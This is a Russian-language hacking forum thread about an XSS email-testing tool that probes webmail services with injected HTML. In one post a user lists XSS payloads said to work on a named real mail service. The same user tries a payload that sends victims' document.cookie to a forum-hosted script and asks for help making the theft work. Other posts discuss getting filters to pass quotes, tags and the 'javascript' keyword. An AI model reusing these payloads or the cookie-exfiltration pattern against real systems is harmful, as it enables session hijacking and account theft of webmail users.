XSS mail Tester

Discussion in 'Уязвимости Mail-сервисов' started by LittleLamer, 29 Nov 2004.

Thread Status:
Not open for further replies.
  1. LittleLamer

    LittleLamer Elder - Старейшина

    Joined:
    4 Nov 2004
    Messages:
    44
    Likes Received:
    17
    Reputations:
    7
    #1 LittleLamer, 29 Nov 2004
    Last edited by a moderator: 14 Sep 2006
    4 people like this.
  2. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Прикольно ничего не скажешь... Можно и у нас выложить если ты не против...
     
  3. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Проблема в том, что это будет работать только в том, случае, когда система пропускает теги, а этого практически никогда не бывает
    Это все нужно оформлять не через Html теги а через Bb теги например (для форумов)

    Да и еще OnERor пишется с двумя R
     
    #3 Algol, 29 Nov 2004
    Last edited: 30 Nov 2004
  4. LittleLamer

    LittleLamer Elder - Старейшина

    Joined:
    4 Nov 2004
    Messages:
    44
    Likes Received:
    17
    Reputations:
    7
    Ну это пока тестовая версия, и она только для email-ов.
    А за OnERor псб - торопился :)
    На счёт выложить - попозже наверно, счас программа сыровата.
     
  5. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    интересная идея :)
    сделаю себе такой...
     
    1 person likes this.
  6. LittleLamer

    LittleLamer Elder - Старейшина

    Joined:
    4 Nov 2004
    Messages:
    44
    Likes Received:
    17
    Reputations:
    7
  7. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    Я пишу такой же, но для форумов с работай чарес прокси серверы и т.д, но не хватает информации - одному сложно искать, если у кого есть подборочки с багами и подробным описанием, скинь те плиз на [email protected] - буду очень признателен.
     
    _________________________
  8. LittleLamer

    LittleLamer Elder - Старейшина

    Joined:
    4 Nov 2004
    Messages:
    44
    Likes Received:
    17
    Reputations:
    7
    Чё т мне кажется, что нужны не готовые "подборочки", как для емаилов, а чтото более навороченное.
    P.s.: хотя я могу ошибаться ;)
     
  9. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    Не понял тебя?
     
    _________________________
  10. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Да, нужно что бы система тестировала прохождение кавычек, тегов, ключевых слов типа javascript в разных случаях, в разных тегах и т.д.
     
  11. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Да я кстати думаю что лучше такую систему вообще полностью онлайн сделать
     
  12. SHiTS

    SHiTS КУЛХАЦКЕР

    Joined:
    11 Dec 2004
    Messages:
    186
    Likes Received:
    15
    Reputations:
    0
    в образовательных целях так сказать,чтоб такие юзвери как я могли трениться.
    ток я пока в это тесте ниче не понимаю.ключевое слово "пока".
     
  13. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    где сейчас можно скачать XSSTest так как приведенные выше ссылки уже не работают??
     
  14. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Смотри Faq к разделу.
     
  15. MeXoN

    MeXoN New Member

    Joined:
    24 Jul 2006
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Сылки работают. Зделай проще скопируй сылку и вствь в адресную строку своего браузера.
     
  16. ya_mag

    ya_mag Elder - Старейшина

    Joined:
    18 Jan 2007
    Messages:
    52
    Likes Received:
    8
    Reputations:
    10
    Прога супер!!! огромное спасибо!
    вот только помагите правильно составить запрос... у меня что то нифига не получается :(
    вобщем вот эта xss
    <body onLoad=alert(2)>
    и вот эта
    <meta http-equiv=Refresh content=0;url=javascript:alert(4)>
    работают на mail.gala.net
    но никак не могу добится что бы мне пришли куки :( я делал вот так:
    <body onLoad="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie>
    вобщем объясните как эту xss юзать?
     
  17. Phen1x

    Phen1x Member

    Joined:
    21 May 2006
    Messages:
    9
    Likes Received:
    13
    Reputations:
    0
    Так так, а как им пользоваться? :)
     
  18. ya_mag

    ya_mag Elder - Старейшина

    Joined:
    18 Jan 2007
    Messages:
    52
    Likes Received:
    8
    Reputations:
    10
    всё очень просто:) отправляеш письмо на свой ящик который хочеш проверить... и смотриш результаты:)
     
  19. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Приветсвтую!
    Вот решил испробовать XSS тестер.
    При завершении пишет постоянно:

    Error in command: must be 250, but returned -->>
    recived:
    ˜øš
    sended:
    QUIT

    Error in command: must be 221, but returned -->>
    recived:
    ˜øš
    Socket closed
    -------ERROR------
    SMTP`session ENDed with ERROR : message not sended!!!
    -----END_ERROR-----

    Вот значит, вроде бы правильно все ввожу:
    в строке
    от: [email protected]
    кому: [email protected]
    сервер: smtp.mail.ru
    порт: 25
    авторизация: USER: 66-66-66 PASSWORD: *********

    запускаю, результат выше был описан.
    что не так?
     
  20. Tesson

    Tesson Banned

    Joined:
    27 Dec 2009
    Messages:
    164
    Likes Received:
    43
    Reputations:
    0
    Линки не рабочие дайте рабочий:)
     
Thread Status:
Not open for further replies.